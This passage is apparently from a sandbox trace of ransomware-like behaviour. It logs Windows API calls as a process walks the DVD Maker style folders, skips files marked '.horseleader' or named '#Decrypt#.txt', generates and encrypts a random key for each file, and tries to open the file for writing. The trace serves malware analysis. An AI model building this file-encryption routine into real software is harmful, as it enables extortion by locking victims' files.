pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.627] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef11f38, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef11f38, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.627] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.627] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png") returned 86 [0251.627] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.628] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.628] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.628] lstrlenW (lpString=".testttjffg") returned 11 [0251.628] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.628] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.628] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.628] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.628] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef38095, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef38095, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.628] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.628] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png") returned 81 [0251.628] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.628] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.628] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.628] lstrlenW (lpString=".testttjffg") returned 11 [0251.628] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.628] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.628] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.629] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef5e1f2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef5e1f2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.629] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.629] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png") returned 87 [0251.629] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.629] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.629] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.629] lstrlenW (lpString=".testttjffg") returned 11 [0251.629] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.629] 
CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.629] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.630] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef8434f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef8434f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.630] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.630] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png") returned 78 [0251.630] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.630] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.630] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.630] lstrlenW (lpString=".testttjffg") returned 11 [0251.631] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.631] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.631] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.631] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef8434f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef8434f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.631] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.631] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png") returned 84 [0251.631] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.631] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.631] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.631] 
lstrlenW (lpString=".testttjffg") returned 11 [0251.631] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.631] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.631] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.631] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OldAge", cAlternateFileName="")) returned 1 [0251.632] lstrcmpiW (lpString1="OldAge", lpString2="Windows") returned -1 [0251.632] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 54 [0251.632] lstrcmpW (lpString1="OldAge", lpString2=".") returned 1 [0251.632] lstrcmpW (lpString1="OldAge", lpString2="..") returned 1 [0251.632] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.632] 
GetProcessHeap () returned 0x780000 [0251.632] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.632] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*") returned 56 [0251.632] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.634] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.634] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\.") returned 56 [0251.634] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.634] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.634] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.634] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\..") returned 57 [0251.634] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0251.634] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.635] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fcc1ca4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fcc1ca4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.635] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.635] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png") returned 72 [0251.635] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.635] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.635] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.635] lstrlenW (lpString=".testttjffg") returned 11 [0251.635] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.635] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.635] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.635] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fce7e01, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fce7e01, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0251.635] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0251.635] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png") returned 67 [0251.635] StrStrIW (lpFirst="15x15dot.png", lpSrch=".horseleader") returned 0x0 [0251.635] lstrcmpW (lpString1="15x15dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.635] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0251.635] lstrlenW (lpString=".testttjffg") returned 11 [0251.636] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png", lpSrch=".testttjffg") returned 0x0 [0251.636] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.636] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff 
[0251.636] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd0df5e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd0df5e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x183b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="decorative_rule.png", cAlternateFileName="")) returned 1 [0251.636] lstrcmpiW (lpString1="decorative_rule.png", lpString2="Windows") returned -1 [0251.636] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png") returned 74 [0251.636] StrStrIW (lpFirst="decorative_rule.png", lpSrch=".horseleader") returned 0x0 [0251.636] lstrcmpW (lpString1="decorative_rule.png", lpString2="#Decrypt#.txt") returned 1 [0251.636] lstrcmpW (lpString1="decorative_rule.png", lpString2="_uninstalling_.png") returned 1 [0251.636] lstrlenW (lpString=".testttjffg") returned 11 [0251.636] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png", lpSrch=".testttjffg") returned 0x0 [0251.636] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.636] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\decorative_rule.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff 
[0251.637] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fdcc62f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fdcc62f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.637] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.637] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png") returned 87 [0251.637] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.637] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.637] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.638] lstrlenW (lpString=".testttjffg") returned 11 [0251.638] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.638] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.638] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.638] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.638] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd80375, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd80375, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.638] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.638] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png") returned 93 [0251.638] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.638] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.638] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.639] lstrlenW (lpString=".testttjffg") returned 11 [0251.639] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.639] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.639] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.639] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fda64d2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fda64d2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.639] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.639] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD 